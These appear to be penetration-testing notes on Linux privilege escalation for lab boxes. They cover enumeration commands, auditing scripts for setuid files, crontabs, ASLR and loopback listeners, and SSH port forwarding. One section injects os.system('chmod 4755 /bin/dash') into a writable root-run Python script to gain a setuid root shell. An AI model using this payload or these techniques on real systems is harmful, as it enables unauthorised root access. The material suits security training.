Linux Priv Esc
Tools and commands for initial post-exploitation recon
Useful priv esc enumeration scripts
LinEnum.sh
linux-exploit-suggester
linuxprivchecker.py
unixprivesc.sh
To see the running processes:
Check the version of an installed package (Debian-based systems)
dpkg -s <program name>
A way to enumerate the files under /home with their owner, group and permission bits (root-owned files inside a user's home, such as the history files below, are worth a look)
find /home -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null |column -t
.bash_logout /home/george/.bash_logout george george 644
.bashrc /home/george/.bashrc george george 644
torrenthoster.zip /home/george/torrenthoster.zip george george 644
motd.legal-displayed /home/george/.cache/motd.legal-displayed george george 644
.sudo_as_admin_successful /home/george/.sudo_as_admin_successful george george 644
user.txt /home/george/user.txt george george 644
.nano_history /home/george/.nano_history root root 600
.mysql_history /home/george/.mysql_history root root 600
.bash_history /home/george/.bash_history root root 600
.profile /home/george/.profile george george 644
Look for a specific package installed on the system
dpkg -l |grep -i <package>
Look for setuid files (the -perm -4000 test matches the setuid bit)
find / -perm -4000 2>/dev/null
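The raw find above lists every setuid file, most of which are expected (passwd, su, mount and friends). The following script, an added example and not part of the original notes, lists setuid and setgid files and then filters out a small allowlist of names that normally carry the bit, so a custom or copied binary stands out. The allowlist is an assumption for illustration, not an authoritative per-distro list; the demo at the end runs on a constructed temp directory so it works without root.

```shell
#!/bin/sh
# Added example: enumerate setuid/setgid files and flag the unusual ones.
# COMMON_SUID is an assumed allowlist of names that usually ship setuid on
# Debian/Ubuntu style systems; extend it for the distro you are on.
COMMON_SUID="passwd su sudo mount umount chsh chfn gpasswd newgrp ping
fusermount pkexec ssh-keysign"

# list_suid DIR...: print "mode owner group path" for every setuid or setgid
# regular file under DIR, staying on the same filesystem (-xdev).
list_suid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %g %p\n' 2>/dev/null
}

# is_common NAME: succeed if NAME is on the allowlist.
is_common() {
    for n in $COMMON_SUID; do
        [ "$n" = "$1" ] && return 0
    done
    return 1
}

# unusual_suid DIR...: only the setuid/setgid files whose basename is not on
# the allowlist; these deserve a closer look (custom tools, copied shells,
# editors, interpreters).
unusual_suid() {
    list_suid "$@" | while read -r mode owner group path; do
        is_common "$(basename "$path")" || echo "$mode $owner $group $path"
    done
}

# Demo on a constructed directory: chmod can set the setuid bit on files we
# own, so no privileges are needed to exercise the filter.
demo_dir=$(mktemp -d)
cp /bin/sh "$demo_dir/passwd"       # name on the allowlist, filtered out
cp /bin/sh "$demo_dir/backup_tool"  # not on the allowlist, reported
chmod 4755 "$demo_dir/passwd" "$demo_dir/backup_tool"
unusual_suid "$demo_dir"            # prints only .../backup_tool
rm -rf "$demo_dir"
```

On a real target run `unusual_suid /` and review each hit: who owns it, whether it is writable, and what it executes (strings, ltrace, or simply reading it if it is a script wrapper).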
World-writable Python file run as root - dash priv esc
If a Python script that root executes is writable by us, add the following to it:
import os
os.system('chmod 4755 /bin/dash')
Note that Linux ignores the setuid bit on interpreted scripts, so the script itself has to be started by a root process (for example a cron job, sudo, or a setuid wrapper binary that calls it); the setuid bit we set is on the compiled /bin/dash binary.
With the setuid bit (mode 4755, not the sticky bit) set on /bin/dash, run dash. dash is used rather than bash because bash drops the elevated effective uid unless started with -p, while dash keeps it.
Running id will show that our euid (effective uid) is now root, so we can run commands as root.
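The precondition for the trick above is a script that a root process runs and that we can modify. The script below, an added example not taken from the original notes, audits system crontab entries for that condition: it extracts every absolute path from each job's command (interpreter and script alike) and reports the ones that are writable by us or that live in a directory we can write to, since such a file can simply be replaced. The crontab it parses is a constructed sample with an assumed job path, written to a temp directory so the run is self-contained.

```shell
#!/bin/sh
# Added example: find scripts run by root from cron that we can modify.

# writable_target PATH: report PATH if we can alter it or replace it.
writable_target() {
    p=$1
    if [ -w "$p" ]; then
        echo "$p: writable"
    elif [ -w "$(dirname "$p")" ]; then
        echo "$p: parent directory writable (file can be replaced)"
    fi
}

# cron_commands FILE: print the command part of each entry in a system
# crontab (/etc/crontab or /etc/cron.d/*), whose format is
#   min hour dom mon dow user command...
# Comments, blank lines and VAR=value lines are skipped.
cron_commands() {
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Z_]+=' "$1" |
        awk '{ for (i = 7; i <= NF; i++) printf "%s%s", $i, (i < NF ? " " : "\n") }'
}

# audit_cron FILE: for every entry, check each absolute path in the command
# (e.g. both /usr/bin/python3 and the script it is given).
audit_cron() {
    cron_commands "$1" | while read -r cmd; do
        for p in $(printf '%s\n' "$cmd" | tr ' ' '\n' | grep '^/' || true); do
            writable_target "$p"
        done
    done
}

# Demo with a constructed crontab and a world-writable script, as in the
# scenario above. The job path is an assumption for illustration.
demo=$(mktemp -d)
printf 'print("backup")\n' > "$demo/backup.py"
chmod 666 "$demo/backup.py"
cat > "$demo/crontab" <<EOF
# constructed sample, not a real system crontab
SHELL=/bin/sh
*/5 * * * * root /usr/bin/python3 $demo/backup.py
0 3 * * *   root /usr/bin/apt-get clean
EOF
audit_cron "$demo/crontab"    # reports $demo/backup.py: writable
rm -rf "$demo"
```

On a target, point `audit_cron` at /etc/crontab and each file in /etc/cron.d; per-user root jobs live in /var/spool/cron/crontabs/root (not readable as a low-privileged user) and have no user field, so they would need the awk loop to start at field 6.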
Find which ports a server is listening on
netstat -an |grep LIST
Check if ASLR is enabled
cat /proc/sys/kernel/randomize_va_space
0
0 -> ASLR is disabled. 1 -> conservative randomisation (stack, mmap base, VDSO and shared libraries are randomised, but not the brk heap). 2 -> full randomisation (as 1, plus the brk heap), the default on modern kernels.
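The sysctl value is the system-wide policy, but a single process can still be started with randomisation turned off for its personality (for example via setarch -R), so when preparing a memory-corruption exploit it is worth checking what a freshly spawned process actually gets. The script below is an added example, not part of the original notes: it decodes the sysctl value and then compares the [stack] mapping of two new processes from /proc/PID/maps, which differ under ASLR and match without it.

```shell
#!/bin/sh
# Added example: interpret randomize_va_space and observe ASLR in practice.

# describe_aslr VALUE: meaning of /proc/sys/kernel/randomize_va_space.
describe_aslr() {
    case "$1" in
        0) echo "disabled" ;;
        1) echo "conservative: stack, mmap base, VDSO and shared libraries randomised; brk heap is not" ;;
        2) echo "full: as 1 plus randomised brk heap" ;;
        *) echo "unknown value $1" ;;
    esac
}

# system_aslr: print the sysctl value with its meaning ('?' if unreadable).
system_aslr() {
    v=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null || echo '?')
    echo "randomize_va_space=$v ($(describe_aslr "$v"))"
}

# stack_start: start address of the [stack] mapping of a brand-new process
# (the grep reads its own maps file, so each call is a fresh address space).
stack_start() {
    /bin/sh -c 'grep "\[stack\]" /proc/self/maps' 2>/dev/null | cut -d- -f1
}

# observe_aslr: "randomised" if two new processes get different stack bases,
# "fixed" if they match, "unknown" if /proc is not available.
observe_aslr() {
    a=$(stack_start)
    b=$(stack_start)
    if [ -z "$a" ] || [ -z "$b" ]; then
        echo "unknown"
    elif [ "$a" = "$b" ]; then
        echo "fixed"
    else
        echo "randomised"
    fi
}

system_aslr
echo "observed in new processes: $(observe_aslr)"
```

A "fixed" result with randomize_va_space=2 means the current environment (the shell, a wrapper, or a container runtime) has disabled randomisation for its children, which is exactly the case the sysctl alone would miss.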
Check for services listening only on localhost (127.0.0.1), which are unreachable from outside but can be port forwarded to our machine
netstat -natp |grep 127.0.0.1
run this on the target Linux box
Port forwarding a local port on the target to the attacker machine
ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171
run this command from your attacker machine: -L binds port 52846 on the attacker side and tunnels it through the SSH session to 127.0.0.1:52846 as seen from the target
then open the local port in your web browser on your attacker machine
e.g. http://127.0.0.1:52846/
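The two steps above (find loopback-only listeners on the target, then build an ssh -L for each) can be joined up. The script below is an added example, not part of the original notes: it parses netstat -natp style output, keeps the TCP listeners bound to a 127.x address, and prints the matching ssh -L command to run from the attacker box. The netstat text is a constructed sample, and jimmy@10.10.10.171 is reused from the example above purely for illustration.

```shell
#!/bin/sh
# Added example: turn loopback-only listeners into ssh -L forward commands.

# Constructed sample of `netstat -natp` output captured on the target.
NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      1234/python3
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.10.171:22         10.10.14.2:51234        ESTABLISHED -'

# loopback_listeners: read netstat output on stdin and print "port program"
# for each TCP listener bound to a 127.x.x.x address, i.e. reachable only
# from the box itself (0.0.0.0 listeners are already reachable directly).
loopback_listeners() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" && $4 ~ /^127\./ {
            port = $4; sub(/.*:/, "", port); print port, $7
         }'
}

# forward_cmd USER HOST PORT: the ssh -L line to run on the attacker machine;
# it binds PORT locally and tunnels it to 127.0.0.1:PORT on HOST.
forward_cmd() {
    echo "ssh -L $3:127.0.0.1:$3 $1@$2"
}

# suggest_forwards USER HOST: one forward command per loopback-only listener.
suggest_forwards() {
    loopback_listeners | while read -r port prog; do
        echo "# $prog listening on 127.0.0.1:$port"
        forward_cmd "$1" "$2" "$port"
    done
}

printf '%s\n' "$NETSTAT_SAMPLE" | suggest_forwards jimmy 10.10.10.171
```

Copy the real output of netstat -natp (or ss -lntp on hosts without netstat, after adjusting the column numbers) from the target into stdin of suggest_forwards. A "-" in the program column means the socket belongs to a process we cannot see as an unprivileged user, which is often the more interesting one.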